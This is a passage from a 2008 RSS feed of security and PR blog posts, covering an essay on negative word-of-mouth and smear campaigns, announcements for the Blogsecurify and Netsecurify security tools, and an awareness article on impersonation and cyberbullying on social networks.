the input of the people they trust. A professionally executed WOM campaign is hundreds of times more effective than any other advertising platform combined with the best communication tactics, especially when it can also help boost the sales performance and corporate operational profit.</p> <p>One of the most specific features of WOM marketing is that it barely relies on any substantial facts, but rather on personal opinions. 
So, even if you read something about yourself on the Web that is not entirely true, the measures you can take are pretty limited. It is almost impossible to start legal actions against a whole community, especially when the initial source of the rumor is hard to identify. It is also quite stupid for a company to blame someone because of his personal beliefs and thus all marketing books share the opinion that the customer is always right.</p> <p>I will stop here. I think it is pointless to explain further the importance of Word-of-Mouth and its global impact on corporate reputations. However, I believe it is crucial to discuss its usage as a rumor-spreading accelerator and general defamation tool.</p> <h3>What makes Negative WOM so powerful?</h3> <p>It is proven that people trust negative information way more than any superlatives. If you hear something bad about someone, this is more likely to be remembered than the high volume of positive stories you can find about that very same person. The reason for this is the embellishing nature of libelous messages, which causes the drama effect. This means that if you start a rumor about something, at the end of the day it will sound totally different from its initial form. In fact, every time somebody repeats the story, the impact will be much bigger and stronger over the target audience. None of the other communication tools enable you to do that.</p> <p>The other thing I would like to mention is the tempo with which viral messages could be disseminated. This is extremely important for every defamation campaign, because it prevents the target from reacting promptly to existing reputation attacks. If the target delays its official response or fails to give a reasonable explanation of the buzz (with a sufficient number of facts), then the allegations will be subconsciously confirmed by the audience. 
Moreover, this delay may actually help the rumors to spread even more and this is how the target&#8217;s reputation can be permanently damaged.</p> <p>In conclusion, I can only say that most of the big corporations tend to underestimate the power of negative communication. They are willing to spend enormous amounts of money on creating a positive buzz, but not on fighting the negative one. In the short term, this may look reasonable, but keep in mind that there will always be someone that doesn&#8217;t like your product and will try everything to take you down. As I always say, it is up to you to decide whether this is going to happen.</p>]]></content:encoded>
      </item>
      <item>
         <title>Wordpress Updates to 2.6.3</title>
         <link>http://blog.blogsecurify.com/2008/10/wordpress-updates-to-263.html</link>
         <description>First let me thank pdp for letting me blog here. I have been reading GNUCITIZEN for a while now and I am very happy to help out. &lt;br /&gt;&lt;br /&gt;In the past week Wordpress has updated their latest version to 2.6.3. Noticing this I decided to have Blogsecurify scan my blog again. After about 30sec Blogsecurify checked and found that I was not running the latest version of Wordpress. So far this has been a great utility. &lt;br /&gt;&lt;br /&gt;One thing I would like to see is an upgrade of the icons. So far I have only seen caution icons next to strings of text, sometimes these strings of text end in Excellent. I think maybe a green, yellow and red icon pattern might be a nice upgrade. &lt;br /&gt;&lt;br /&gt;Thanks for all the hard work.&lt;br /&gt;JimShoe</description>
         <author>noreply@blogger.com (JimShoe)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-7658822719477266314</guid>
         <pubDate>Tue, 28 Oct 2008 10:54:00 -0700</pubDate>
      </item>
      <item>
         <title>Smear of the Year</title>
         <link>http://www.spinhunters.org/blog/smear-of-the-year/</link>
         <description>The high volume of recent smear campaigns has led to the need of a special acknowledgment. Spin Hunters is eager to rate the most popular cases of reputation attacks in the last year. Whether this will be the hysterical speculations over the upcoming election or the intensive rumors about the crush of a big financial institution, it is up to you to decide. [...]</description>
         <guid isPermaLink="false">https://www.spinhunters.org/?p=105</guid>
         <pubDate>Mon, 27 Oct 2008 10:29:00 -0700</pubDate>
         <content:encoded><![CDATA[<a rel="nofollow" target="_blank" href="http://flickr.com/photos/bettinatizzy/2086994424/in/photostream/"><img class="initial-capital" src="http://farm3.static.flickr.com/2250/2086994424_7601870aaa_m.jpg?v=0" alt="Twisty Smears by Juria Yoshikawa"/></a><p><em>The high volume of recent smear campaigns has led to the need of a special acknowledgment.</em></p> <p>Spin Hunters is eager to rate the most popular cases of reputation attacks in the last year. Whether this will be the hysterical speculations over the upcoming election or the intensive rumors about the crush of a big financial institution, it is up to you to decide. Therefore if you suspect that some of the current affairs are part of a malicious Black PR plot or you know this for sure, please submit your nominations by <a rel="nofollow" target="_blank" href="http://www.spinhunters.org/contact">emailing us</a>. At the end of the year, we will honor the most over-hyped stories by giving them a special award and public rebuke.</p>]]></content:encoded>
      </item>
      <item>
         <title>Netsecurify Screenshots</title>
         <link>http://blog.netsecurify.com/2008/10/netsecurify-screenshots.html</link>
         <description>&lt;p&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973268871/"&gt;&lt;img src="http://farm4.static.flickr.com/3277/2973268871_2dabec7f26_s.jpg" alt="Netsecurify Demo 01"/&gt;&lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973268953/"&gt;&lt;img src="http://farm4.static.flickr.com/3282/2973268953_414ae74eb1_s.jpg" alt="Netsecurify Demo 02"/&gt;  &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269047/"&gt;&lt;img src="http://farm4.static.flickr.com/3022/2973269047_4cecb4f389_s.jpg" alt="Netsecurify Demo 03"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2974121322/"&gt;&lt;img src="http://farm4.static.flickr.com/3028/2974121322_3620a60988_s.jpg" alt="Netsecurify Demo 04"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269265/"&gt;&lt;img src="http://farm4.static.flickr.com/3202/2973269265_c772ab099c_s.jpg" alt="Netsecurify Demo 05"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269367/"&gt;&lt;img src="http://farm4.static.flickr.com/3050/2973269367_228292baa8_s.jpg" alt="Netsecurify Demo 06"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269501/"&gt;&lt;img src="http://farm4.static.flickr.com/3205/2973269501_7a56264d68_s.jpg" alt="Netsecurify Demo 07"/&gt;&lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2973269655/"&gt;&lt;img src="http://farm4.static.flickr.com/3196/2973269655_bc458c10a4_s.jpg" alt="Netsecurify Demo 08"/&gt; &lt;/a&gt;&lt;a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/24967759@N00/2974121782/"&gt;&lt;img src="http://farm4.static.flickr.com/3185/2974121782_ea4641480f_s.jpg" alt="Netsecurify Demo 09"/&gt; 
&lt;/a&gt;&lt;/p&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-6611345454199592701.post-533674730817576075</guid>
         <pubDate>Sun, 26 Oct 2008 02:10:00 -0700</pubDate>
      </item>
      <item>
         <title>Try Netsecurify</title>
         <link>http://blog.netsecurify.com/2008/10/try-netsecurify.html</link>
         <description>The Netsecurify service is still in private-beta which means that we are only offering it for free to our friends, our clients and selected members of the public. We are also willing to open it for prime time use to organizations with low security budget, charity organizations and others who might be in need. Please, &lt;a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/contact"&gt;get in touch&lt;/a&gt; with us if you want to try it out.</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-6611345454199592701.post-620036889456929733</guid>
         <pubDate>Mon, 20 Oct 2008 06:11:00 -0700</pubDate>
      </item>
      <item>
         <title>WP Blogsecurify Wordpress Security Plugin</title>
         <link>http://blog.blogsecurify.com/2008/10/wp-blogsecurify-wordpress-security.html</link>
         <description>It is finally out! Now you can download WP Blogsecurify Wordpress Security Plugin. Check out the &lt;a rel="nofollow" target="_blank" href="http://lab.gnucitizen.org/projects/wp-blogsecurify"&gt;GNUCITIZEN Laboratory&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;WP Blogsecurify is a security plugin for Wordpress designed to integrate several simple but important security patches for the popular blogging platform. This plugin was developed by the Blogsecurify team - a special division of GNUCITIZEN Information Security Think Tank.&lt;br /&gt;&lt;br /&gt;WP Blogsecurify protects your blog by:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;forcing users to login over a secure communication channel.&lt;/li&gt;&lt;li&gt;protecting session identifiers from incidental session leaks.&lt;/li&gt;&lt;li&gt;hiding database errors which could be caused by malfunctioning plugins.&lt;/li&gt;&lt;li&gt;protecting the entire user session from session-hijacking attacks.&lt;/li&gt;&lt;/ul&gt;&lt;span style="font-style:italic;"&gt;This plugin is designed to be simple and effective. Future versions will protect against SQLI and XSS attacks. We are also planning to integrate WP Blogsecurify with our free social media security testing engine.&lt;/span&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-1261227230671258410</guid>
         <pubDate>Mon, 20 Oct 2008 05:27:00 -0700</pubDate>
      </item>
      <item>
         <title>Exploiting trust in social networks</title>
         <link>http://blog.blogsecurify.com/2008/10/exploiting-trust-in-social-networks.html</link>
         <description>&lt;a rel="nofollow" target="_blank" href="http://3.bp.blogspot.com/_TkVLLciT0WE/SOeVsb3gjtI/AAAAAAAAAAo/jD9keaBHHXI/s1600-h/people_sm.jpg"&gt;&lt;img style="cursor:pointer;" src="http://3.bp.blogspot.com/_TkVLLciT0WE/SOeVsb3gjtI/AAAAAAAAAAo/jD9keaBHHXI/s400/people_sm.jpg" alt="" id="BLOGGER_PHOTO_ID_5253332080978333394" border="0"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="text-decoration:underline;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align:justify;"&gt;This is the first in a series of articles on Blogsecurify regarding the security of social networks and social media. In this article I will specifically talk about exploiting trust in social networks. My interest in social network/media security started several months ago when I put together a presentation on what many in the security community believe are the "top 5" threats to social networks. You can read more about the presentation on my blog, &lt;a rel="nofollow" target="_blank" href="http://spylogic.net/item/288"&gt;spylogic.net&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align:justify;"&gt;&lt;br /&gt;The threats we will discuss in this article are "evil twin" attacks, &lt;a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Cyber-bullying"&gt;cyberbullying&lt;/a&gt; and &lt;a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Cyberstalking"&gt;cyberstalking&lt;/a&gt; as they relate to the trust model of social networks. Let's be honest, it's trivial to exploit trust in social networks. Why? There is no form of real authentication on any social network such as Facebook, MySpace, LinkedIn and Twitter (to name just a few). You can impersonate anyone, become someone new or hijack the profile of another existing user with very little skill. Create a profile, make up an identity to include birth date, relationship status, goals and dreams. Guess what? 
You are welcomed into the community with a complete profile that was never authenticated or verified as real. This can lead to leveraging and exploiting multiple levels of trust for malicious purposes.&lt;br /&gt;&lt;br /&gt;Interestingly enough, the only thing to deter you from creating a fake profile or assuming the identity of someone else is the "terms of use" of the various social media companies. Most state that you must be a real person and you can't impersonate someone else. Take the &lt;a rel="nofollow" target="_blank" href="http://www.facebook.com/terms.php"&gt;Facebook terms of use&lt;/a&gt; for example:&lt;br /&gt;&lt;/div&gt;&lt;blockquote&gt;"You agree not to use the Service or the Site to...impersonate any person or entity, or falsely state or otherwise misrepresent yourself, your age or your affiliation with any person or entity..."&lt;/blockquote&gt;&lt;div style="text-align:justify;"&gt;Problem is...since when do attackers follow policies and terms of use?&lt;br /&gt;&lt;br /&gt;The "evil twin" attack is where an attacker takes on the persona or identity of a real person. This real person could be a celebrity or someone like a CEO or CFO of a major corporation. Becoming the identity of the victim gives you access to friends and associates that now trust &lt;span style="font-style:italic;"&gt;you&lt;/span&gt; since they think you are that person. Once you have access to a high value target profile you can potentially have access to lots of personal information...information that in some cases could allow you to conduct a password reset attack with the victim's web mail account (like what happened to &lt;a rel="nofollow" target="_blank" href="http://blogs.artvoice.com/techvoice/2008/09/17/hackers-break-into-sarah-palins-inbox/"&gt;Sarah Palin&lt;/a&gt;) as one example. It would be even more advantageous using this profile to target the victim's friends as well. 
Why not...they trust you, right?&lt;br /&gt;&lt;br /&gt;Further manipulation of trust relationships leads to a whole slew of social engineering scenarios with various goals that an attacker could accomplish. The list may possibly be endless as the only limit to these types of attacks is the creativity of the attacker. Keep in mind that social engineering used as a way to attack people on social networks is not new by any means. Take for example the recent highly publicized &lt;a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Megan_Meier"&gt;Megan Meier&lt;/a&gt; "cyberbullying" case where an adult female posed as a teenage boy to literally destroy the life of another teenager. Megan committed suicide because of an attack that took very little skill to complete, yet had a life-ending impact on the victim. We also see many different stories of cyberbullying/stalking in the mainstream media. &lt;a rel="nofollow" target="_blank" href="http://www.phillyburbs.com/pb-dyn/news/111-09232008-1595106.html"&gt;Teens picking on teens&lt;/a&gt;, harassment of teachers, sexual predators, as well as &lt;a rel="nofollow" target="_blank" href="http://www.projo.com/news/content/NO_PAWTUCKET_CYBERSTALK12_09-12-08_RMBIC7S_v18.16e4a48.html"&gt;manipulating relationships&lt;/a&gt; to damage the reputation of others are popular trends. The list goes on and these problems are only getting worse.&lt;br /&gt;&lt;br /&gt;If you are reading this you are most likely in the security community and you "get it". You know not to trust anything or anybody on the Internet, let alone social networks, with your personal information. If you do allow access to your personal information then you probably know the risks and accept them. However, the people not reading this article are the ones that "don't get it", and we are talking about the majority of social network users. 
This includes your non-security friends, family and the general public.&lt;br /&gt;&lt;br /&gt;So why don't the various social networks do something about this and educate their user base? The social networks will &lt;span style="font-style:italic;"&gt;never&lt;/span&gt; promote using social networks safely. Why? Because the more information you share with them, the more valuable you are! It was estimated a few years ago when News Corp purchased MySpace the average user of MySpace at that time was &lt;a rel="nofollow" target="_blank" href="http://gigaom.com/2008/03/13/lets-justify-facebooks-300-per-user-valuation/"&gt;worth approximately $27 each&lt;/a&gt;! Could you imagine the financial impact to the social network companies if every user started to lock down or not give away private information contained in these networks?&lt;br /&gt;&lt;br /&gt;I'm not suggesting to not use social networks but the key here is for us to educate the users of social networks that "don't get it". They should know that any information posted should always be considered public and if you do need to share personal information be very cautious about posting it. Trust in social media? There is no trust, this trust is implied and given.&lt;br /&gt;&lt;br /&gt;At the end of this month (ironically October is security awareness month) I will be releasing a Facebook Privacy &amp;amp; Security Guide which documents the recommended privacy and security settings you should use while still being able to use the "social" aspects of Facebook. I also include tips that can be used with any social media application to enhance your security and privacy. The guide is short and easy to distribute. I encourage it to be shared with those that "don't get it". 
:-)&lt;br /&gt;&lt;br /&gt;The next article in this series will talk about the security (or lack of security) of applications, widgets and anything else that can be added by a third-party to social network profiles.&lt;br /&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (Tom)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-7894142370425781425</guid>
         <pubDate>Fri, 03 Oct 2008 18:05:00 -0700</pubDate>
         <media:thumbnail width="72" url="http://3.bp.blogspot.com/_TkVLLciT0WE/SOeVsb3gjtI/AAAAAAAAAAo/jD9keaBHHXI/s72-c/people_sm.jpg" height="72" />
      </item>
      <item>
         <title>Recruiting</title>
         <link>http://blog.blogsecurify.com/2008/09/recruiting.html</link>
         <description>We have started the recruiting process at &lt;a rel="nofollow" target="_blank" href="http://www.gnucitizen.org"&gt;GNUCITIZEN&lt;/a&gt;. Follow the blog for more updates.</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-2066376015558925713</guid>
         <pubDate>Thu, 25 Sep 2008 02:12:00 -0700</pubDate>
      </item>
      <item>
         <title>Beginning</title>
         <link>http://blog.netsecurify.com/2008/09/beginning.html</link>
         <description>Today is the day. Netsecurify officially launches today.</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-6611345454199592701.post-6667434982835171778</guid>
         <pubDate>Thu, 11 Sep 2008 05:49:00 -0700</pubDate>
      </item>
      <item>
         <title>The Framework is There</title>
         <link>http://blog.websecurify.com/2008/07/framework-is-there.html</link>
         <description>The framework is there. It is live. Now we are using a powerful scaffolding logic which will enable us to expand without much overhead. The testing API is coming soon.</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-2382932154546319997.post-728725100114601868</guid>
         <pubDate>Thu, 31 Jul 2008 04:18:00 -0700</pubDate>
      </item>
      <item>
         <title>Starting Websecurify</title>
         <link>http://blog.websecurify.com/2008/06/starting-websecurify.html</link>
         <description>Starting work on Websecurify.</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-2382932154546319997.post-3609731593647444456</guid>
         <pubDate>Thu, 26 Jun 2008 03:29:00 -0700</pubDate>
      </item>
      <item>
         <title>Official Launch</title>
         <link>http://blog.blogsecurify.com/2008/06/official-launch.html</link>
         <description>The official launch of Blogsecurify will take place on Monday 23rd of June.</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-747215489355315227</guid>
         <pubDate>Sun, 22 Jun 2008 10:48:00 -0700</pubDate>
      </item>
      <item>
         <title>Soon to Expect</title>
         <link>http://blog.blogsecurify.com/2008/06/soon-to-expect.html</link>
         <description>Soon to expect Websecurify...</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-1136720549717667327</guid>
         <pubDate>Fri, 20 Jun 2008 03:38:00 -0700</pubDate>
      </item>
      <item>
         <title>Blogsecurify Promo Video</title>
         <link>http://blog.blogsecurify.com/2008/06/blogsecurify-promo-video.html</link>
         <description>Enjoy the promo video!&lt;br /&gt;&lt;br /&gt;&lt;iframe class="embeddedvideo" src="http://www.youtube.com/v/1uyx1We5ckU&amp;amp;hl=en" type="application/x-shockwave-flash" width="425" height="344"&gt;&lt;/iframe&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-8974049461127124793</guid>
         <pubDate>Thu, 19 Jun 2008 08:06:00 -0700</pubDate>
      </item>
      <item>
         <title>Looking for Bloggers</title>
         <link>http://blog.blogsecurify.com/2008/06/looking-for-bloggers.html</link>
         <description>Although this project is primarily oriented towards the online security testing tool, I am welcoming anyone who is willing to become an active Blogsecurify blogger to get in touch with us. It could turn out to be an excellent opportunity to start your online career. And it is fun!</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-7293677220942579707</guid>
         <pubDate>Thu, 19 Jun 2008 07:31:00 -0700</pubDate>
      </item>
      <item>
         <title>Welcome</title>
         <link>http://blog.blogsecurify.com/2008/06/welcome.html</link>
         <description>This is the official blog of &lt;a rel="nofollow" target="_blank" href="http://www.blogsecurify.com/"&gt;Blogsecurify&lt;/a&gt;. Here we will post further updates regarding our online tool. Stay tuned.</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-3591500561419967267</guid>
         <pubDate>Thu, 19 Jun 2008 07:05:00 -0700</pubDate>
      </item>
   </channel>
</rss>
